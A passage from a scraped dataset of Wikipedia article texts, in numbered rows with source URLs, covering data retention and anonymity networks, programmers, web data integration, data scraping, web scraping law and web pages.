Investigation (FBI) can obtain access to such information by means of a National Security Letter (NSL). The Electronic Frontier Foundation states that "NSLs are secret subpoenas issued directly by the FBI without any judicial oversight. These secret subpoenas allow the FBI to demand that online service providers or ecommerce companies produce records of their customers' transactions. The FBI can issue NSLs for information about people who haven't committed any crimes. NSLs are practically immune to judicial review. They are accompanied by gag orders that allow no exception for talking to lawyers and provide no effective opportunity for the recipients to challenge them in court. This secret subpoena authority, which was expanded by the controversial USA PATRIOT Act, could be applied to nearly any online service provider for practically any type of record, without a court ever knowing". The Washington Post has published a well researched article on the FBI's use of National Security Letters. 99 The United States does not have any Internet Service Provider (ISP) mandatory data retention laws similar to the European Data Retention Directive, 100 which was retroactively invalidated in 2014 by the Court of Justice of the European Union. Some attempts to create mandatory retention legislation have failed: While it is often argued that data retention is necessary to combat terrorism and other crimes, there are still others who oppose data retention. Data retention may assist the police and security services to identify potential terrorists and their accomplices before or after an attack has taken place. For example, the authorities in Spain and the United Kingdom stated that retained telephony data made a significant contribution to police enquires into the 2004 Madrid train bombings and the 2005 London bombings. 106 The opponents of data retention make the following arguments: The current directive proposal (see above) would force ISPs to record the internet communications of its users. The basic assumption is that this information can be used to identify with whom someone, whether innocent citizen or terrorist, communicated throughout a specific timespan. Believing that such as mandate would be useful is ignoring that some very committed community of crypto professionals has been preparing for such legislation for decades. Below are some strategies available today to anyone to protect themselves, avoid such traces, and render such expensive and legally dubious logging operations useless. There are anonymizing proxies that provide slightly more private web access. Proxies must use HTTPS encryption in order to provide any level of protection at all. Unfortunately, proxies require the user to place a large amount of trust in the proxy operator (since they see everything the user does over HTTP), and may be subject to traffic analysis. Some P2P services like file transfer or voice over IP use other computers to allow communication between computers behind firewalls. This means that trying to follow a call between two citizens might, mistakenly, identify a third citizen unaware of the communication. For security conscious citizens with some basic technical knowledge, tools like I2P The Anonymous Network, Tor, Mixmaster and the cryptography options integrated into any many modern mail clients can be employed. I2P is an international peer-to-peer anonymizing network, which aims at not only evading data retention, but also at making spying by other parties impossible. The structure is similar to the one TOR (see next paragraph) uses, but there are substantial differences. It protects better against traffic analysis and offers strong anonymity and for net-internal traffic end-to-end encryption. Due to unidirectional tunnels it is less prone to timing attacks than Tor. In I2P, several services are available: anonymous browsing, anonymous e-mails, anonymous instant messenger, anonymous file-sharing, and anonymous hosting of websites, among others. Tor is a project of the U.S. non-profit Tor Project 112 to develop and improve an onion routing network to shield its users from traffic analysis. Mixmaster is a remailer service that allows anonymous email sending. JAP is a project very similar to Tor. It is designed to route web requests through several proxies to hide the end user's Internet address. Tor support has been included into JAP. The Arbeitskreis Vorratsdatenspeicherung (German Working Group on Data Retention) is an association of civil rights campaigners, data protection activists and Internet users. The Arbeitskreis coordinates the campaign against the introduction of data retention in Germany. 113 An analysis of federal Crime Agency (BKA) statistics published on 27 January 2010 by civil liberties NGO AK Vorrat revealed that data retention did not make a prosecution of serious crime any more effective. 114 As the EU Commission is currently considering changes to the controversial EU data retention directive, a coalition of more than 100 civil liberties, data protection and human rights associations, jurists, trade unions and others are urging the commission to propose the repeal of the EU requirements regarding data retention in favour of a system of expedited preservation and targeted collection of traffic data. 114 |
619 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Category:All_articles_containing_potentially_dated_statements | Articles in category contain all recorded statements that may become dated. The statements may need to be updated, removed or edited for perspective. Articles containing older statements are more likely to be dated. This is not a backlog; not all articles included in this category will need updating at this point in time. See also Category:Articles containing potentially dated statements which contains potentially dated statements ordered by originating date. Use As of to mark all individual statements that may become dated, this will automatically add them to the appropriate categories. Wherever possible, use Update after to mark exactly when statements will need updating in addition to using As of . So that articles don't remain in this category too long, a suggestion is made to work on articles beginning with a certain letter. The letter is changed daily. The current focus is on articles beginning with: N. The following 200 pages are in this category, out of approximately 78,001 total. This list may not reflect recent changes. |
620 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Programmers | A programmer, computer programmer or coder is an author of computer source code someone with skill in computer programming. The professional titles software developer and software engineer are used for jobs that require a programmer. Generally, a programmer writes code in a computer language and with an intent to build software that achieves some goal. Sometimes a programmer or job position is identified by the language used or target platform. For example, assembly programmer, web developer. The job titles that include programming tasks have differing connotations across the computer industry and to different individuals. The following are notable descriptions. A software developer primarily implements software based on specifications and fixes bugs. Other duties may include reviewing code changes and testing. To achieve the required skills for the job, they might obtain a computer science or associate degree, attend a programming boot camp or be self-taught. A software engineer usually is responsible for the same tasks as a developer plus broader responsibilities of software engineering including architecting and designing new features and applications, targeting new platforms, managing the software development lifecycle (design, implementation, testing, and deployment), leading a team of programmers, communicating with customers, managers and other engineers, considering system stability and quality, and exploring software development methodologies. Sometimes, a software engineer is required to have a degree in software engineering, computer engineering, or computer science. Some countries legally require an engineering degree to be called engineer. 1 2 3 British countess and mathematician Ada Lovelace is often considered to be the first computer programmer. She authored an algorithm, which was published in October 1842, for calculating Bernoulli numbers on the Charles Babbage analytical engine. 4 Because the machine was not completed in her lifetime, she never experienced the algorithm in action. In 1941, German civil engineer Konrad Zuse was the first person to execute a program on a working, program-controlled, electronic computer. 5 From 1943 to 1945, per computer scientist Wolfgang K. Giloi and AI professor Ra l Rojas et al., Zuse created the first, high-level programming language, Plankalk l. 6 7 Members of the 1945 ENIAC programming team of Kay McNulty, Betty Jennings, Betty Snyder, Marlyn Wescoff, Fran Bilas and Ruth Lichterman have since been credited as the first professional computer programmers. 8 9 The first company founded specifically to provide software products and services was the Computer Usage Company in 1955. Before that time, computers were programmed either by customers or the few commercial computer manufacturers of the time, such as Sperry Rand and IBM. 10 The software industry expanded in the early 1960s, almost immediately after computers were first sold in mass-produced quantities. Universities, governments, and businesses created a demand for software. Many of these programs were written in-house by full-time staff programmers; some were distributed between users of a particular machine for no charge, while others were sold on a commercial basis. Other firms, such as Computer Sciences Corporation (founded in 1959), also started to grow. Computer manufacturers soon started bundling operating systems, system software and programming environments with their machines; the IBM 1620 came with the 1620 Symbolic Programming System and FORTRAN. 11 The industry expanded greatly with the rise of the personal computer (PC) in the mid 1970s, which brought computing to the average office worker. In the following years, the PC also helped create a constantly growing market for games, applications and utility software. This resulted in increased demand for software developers for that period of time. 12 Computer programmers write, test, debug, and maintain the detailed instructions, called computer programs, that computers must follow to perform their functions. Programmers also conceive, design, and test logical structures for solving problems by computer. Many technical innovations in programming — advanced computing technologies and sophisticated new languages and programming tools — have redefined the role of a programmer and elevated much of the programming work done today. Job titles and descriptions may vary, depending on the organization. 13 Programmers work in many settings, including corporate information technology (IT) departments, big software companies, small service firms and government entities of all sizes. Many professional programmers also work for consulting companies at client sites as contractors. Licensing is not typically required to work as a programmer, although professional certifications are commonly held by programmers. 13 Programming is considered a profession. 14 15 16 Programmers' work varies widely depending on the type of business for which they are writing programs. For example, the instructions involved in updating financial records are very different from those required to duplicate conditions on an aircraft for pilots training in a flight simulator. Simple programs can be written in a few hours. More complex ones may require more than a year of work, while others are never considered 'complete' but rather are continuously improved as long as they stay in use. In most cases, several programmers work together as a team under a senior programmer's supervision. citation needed Programming editors, also known as source code editors, are text editors that are specifically designed for programmers or developers to write the source code of an application or a program. Most of these editors include features useful for programmers, which may include color syntax highlighting, auto indentation, auto-complete, bracket matching, syntax check, and allows plug-ins. These features aid the users during coding, debugging and testing. 17 According to BBC News, 17% of computer science students could not find work in their field six months after graduation in 2009 which was the highest rate of the university subjects surveyed while 0% of medical students were unemployed in the same survey. 18 After the crash of the dot-com bubble (1999 2001) and the Great Recession (2008), many U.S. programmers were left without work or with lower wages. 19 20 In addition, enrollment in computer-related degrees and other STEM degrees (STEM attrition) 21 in the US has been dropping for years, especially for women, 22 which, according to Beaubouef and Mason, 23 could be attributed to a lack of general interest in science and mathematics and also out of an apparent fear that programming will be subject to the same pressures as manufacturing and agriculture careers. For programmers, the U.S. Bureau of Labor Statistics (BLS) Occupational Outlook originally predicted a growth for programmers of 12 percent from 2010 to 2020 24 and thereafter a decline of 7 percent from 2016 to 2026, a further decline of 9 percent from 2019 to 2029, a decline of 10 percent from 2021 to 2031. 13 and then a decline of 11 percent from 2022 to 2032. 25 Since computer programming can be done from anywhere in the world, companies sometimes hire programmers in countries where wages are lower. 13 However, for software developers BLS projects for 2019 to 2029 a 22% increase in employment, from 1,469,200 to 1,785,200 jobs with a median base salary of $110,000 per year. This prediction is lower than the earlier 2010 to 2020 predicted increase of 30% for software developers. 26 27 20 Though the distinction is somewhat ambiguous, software developers engage in a wider array of aspects of application development and are generally higher skilled than programmers, making outsourcing less of a risk. 28 29 Another reason for the decline for programmers is their skills are being merged with other professions, such as developers, as employers increase the requirements for a position over time. Then there is the additional concern that recent advances in artificial intelligence might impact the demand for future generations of Software professions. 30 31 32 33 34 35 36 |
621 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_data_integration | Web data integration (WDI) is the process of aggregating and managing data from different websites into a single, homogeneous workflow. This process includes data access, transformation, mapping, quality assurance and fusion of data. Data that is sourced and structured from websites is referred to as "web data". WDI is an extension and specialization of data integration that views the web as a collection of heterogeneous databases. Data integration techniques in the context of the web, forms the foundation for businesses taking advantage of data available on the ever-increasing number of publicly-accessible websites. 1 Corporate spending on this area amounted to about USD 2.5bn in 2017, and it is expected that by 2020 the market will reach almost USD 7bn. 2 Web data integration extends and specializes data integration to see the web as a collection of views of databases accessible over the web protocols, including, but not limited to: 3 WDI has technical challenges different from data integration due to the data access and transformation required for the web data sources being often unstructured or semi-structured data without a standard query mechanism. Understanding the quality and veracity of data is even more important in WDI than in data integration, as the data is generally less implicitly trusted and of lower quality than that which is collected from a trusted source. There are attempts to try to automate a trust rating for web data. 4 Data quality in data integration can generally happen after data access and transformation, but in WDI quality may need to be monitored as data is collected, due to both the time and the cost of re-collecting the data. 5 WDI has application in many fields, including bioinformatics, 6 search engines, 7 price comparison, 8 and forensic search 9 data analysis, business intelligence, ecommerce, 10 healthcare, pharmaceutical 11 and product development. Most price comparison engines and recommendation systems use user generated data to create recommendations for their users. Similarly, healthcare systems use results of competitions conducted on websites like Kaggle 12 to see the accuracy of data and to create user-focused products. In fact, IBM estimates that poor quality WDI is costing companies over $3 trillion 13 in revenue each year. |
622 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-8 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
623 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Text_pattern_matching | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
624 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_page | A web page (or webpage) is a document on the Web that is accessed in a web browser. 1 A website typically consists of many web pages linked together under a common domain name. The term "web page" is thus a metaphor of paper pages bound together into a book. Each web page is identified by a distinct Uniform Resource Locator (URL). When the user inputs a URL into their web browser, the browser retrieves the necessary content from a web server and then transforms it into an interactive visual representation on the user's screen. 2 If the user clicks or taps a link, the browser repeats this process to load the new URL, which could be part of the current website or a different one. The browser has features, such as the address bar, that indicate which page is displayed. A web page is a structured document. The core element is a text file written in the HyperText Markup Language (HTML). This specifies the content of the page, 3 including images and video. Cascading Style Sheets (CSS) specify the presentation of the page. 3 CSS rules can be in separate text files or embedded within the HTML file. The vast majority 4 of pages have JavaScript programs, enabling a wide range of behavior. 3 The newer WebAssembly language can also be used as a supplement. 5 The most sophisticated web pages, known as web apps, combine these elements in a complex manner. From the perspective of server-side website deployment, there are two types of web pages: static and dynamic. Static pages are retrieved from the web server's file system without any modification, 6 while dynamic pages must be created by the server on the fly, typically reading from a database to fill out a template, before being sent to the user's browser. 7 An example of a dynamic page is a search engine results page. |
625 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-29 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages 